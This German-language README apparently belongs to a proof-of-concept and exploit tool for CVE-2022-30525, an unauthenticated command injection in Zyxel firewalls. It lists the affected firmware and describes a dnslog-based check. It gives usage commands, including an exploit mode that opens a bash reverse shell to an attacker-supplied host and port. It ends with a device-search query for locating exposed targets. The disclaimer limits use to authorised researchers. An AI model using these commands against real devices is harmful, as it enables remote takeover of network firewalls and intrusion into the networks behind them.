
CVE-2022-30525 Zyxel Firewall-Befehlsinjektions-Schwachstelle POC&EXPC
CVE-2022-30525 POC&EXP
author:160team.west9B
Nur für die Verwendung durch autorisierte Sicherheitsforscher bestimmt. Beachten Sie das Cybersicherheitsgesetz. Für etwaige Probleme wird keine Haftung übernommen; die Verantwortung liegt beim Anwender, nicht beim Autor.
Am 12. Mai 2022 veröffentlichte Zyxel (合勤) ein Sicherheitsbulletin und behob eine nicht authentifizierte Remote-Befehlsinjektions-Schwachstelle (CVE-2022-30525) in seinen Firewall-Geräten. Der CVSS-Score dieser Schwachstelle beträgt 9.8. Die Schwachstelle existiert im CGI-Programm bestimmter Zyxel-Firewall-Versionen und erlaubt es, ohne Authentifizierung beliebige Befehle auf betroffenen Geräten auszuführen.
Betroffene Versionen:
ATP-Serie Firmware: 5.10-5.21 Patch 1
VPN-Serie Firmware: 4.60-5.21 Patch 1
USG FLEX 100(W), 200, 500, 700: 5.00-5.21 Patch 1
USG FLEX 50(W)/USG20(W)-VPN: 5.10-5.21 Patch 1
Die Befehlsausführung bei dieser Schwachstelle hat kein Echo. Daher fordert die POC-Verifizierung die dnslog-API an. Geht bei dnslog eine Anfrage ein, ist die Schwachstelle vorhanden. Um Fehlalarme durch Netzwerkverzögerungen zu vermeiden, wird die DNSLOG-Verifizierungsanfrage um 10 Sekunden verzögert.
usage_poc: ./cve-2022-30525 -m poc -u https://192.168.1.1/
exp verwendet eine Bash-Reverse-Shell; nach -m exp werden die VPS-IP und der Port angegeben.
**usage_exp:./cve-2022-30525 -m exp -u https://192.168.1.1/ -lhost 192.168.1.2 -lport 1337 **

title="USG FLEX xx"